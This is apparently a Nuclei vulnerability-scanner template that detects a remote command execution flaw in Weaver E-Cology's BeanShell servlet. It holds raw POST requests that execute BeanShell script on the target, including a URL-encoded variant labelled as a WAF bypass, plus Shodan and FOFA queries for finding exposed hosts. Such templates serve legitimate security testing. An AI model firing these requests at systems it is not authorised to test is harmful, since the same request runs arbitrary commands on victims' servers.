nuclei-templates/http/vulnerabilities/weaver/weaver-ecology-bshservlet-r...

44 lines
1.3 KiB
YAML
Raw Normal View History

2023-09-14 19:11:38 +00:00
id: weaver-ecology-bshservlet-rce
2023-08-18 03:22:06 +00:00
info:
2023-09-14 19:11:38 +00:00
name: Weaver E-Cology BeanShell - Remote Command Execution
2023-08-18 03:22:06 +00:00
author: SleepingBag945
severity: critical
2023-09-14 19:11:38 +00:00
description: |
Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
metadata:
2023-10-14 11:27:55 +00:00
verified: true
max-request: 2
shodan-query: ecology_JSessionid
2023-10-14 11:27:55 +00:00
fofa-query: app="泛微-协同办公OA"
2023-08-18 03:22:06 +00:00
tags: beanshell,rce,weaver
http:
- raw:
- |
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
bsh.script=print%28%22{{randstr}}%22%29%3B
- | # bypass waf
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
%62%73%68%2e%73%63%72%69%70%74=%70%72%69%6e%74%28%22{{randstr}}%22%29%3b
matchers-condition: and
matchers:
2023-09-14 19:11:38 +00:00
- type: regex
regex:
2023-08-18 03:22:06 +00:00
- "BeanShell Test Servlet"
2023-09-14 19:11:38 +00:00
- "(?i)<pre>(\n.*){{randstr}}"
condition: and
2023-08-18 03:22:06 +00:00
- type: status
status:
2023-10-14 11:27:55 +00:00
- 200
# digest: 4a0a00473045022100c9ba653f57e01fe93046cf98f3051f013ebdb7d92c0cd2869712af7437fab42b0220290358ee34352b5b70ca770c5531a3deff20a4c8a1c43b569b14a46cbfb7517b:922c64590222798bb761d5b6d8e72950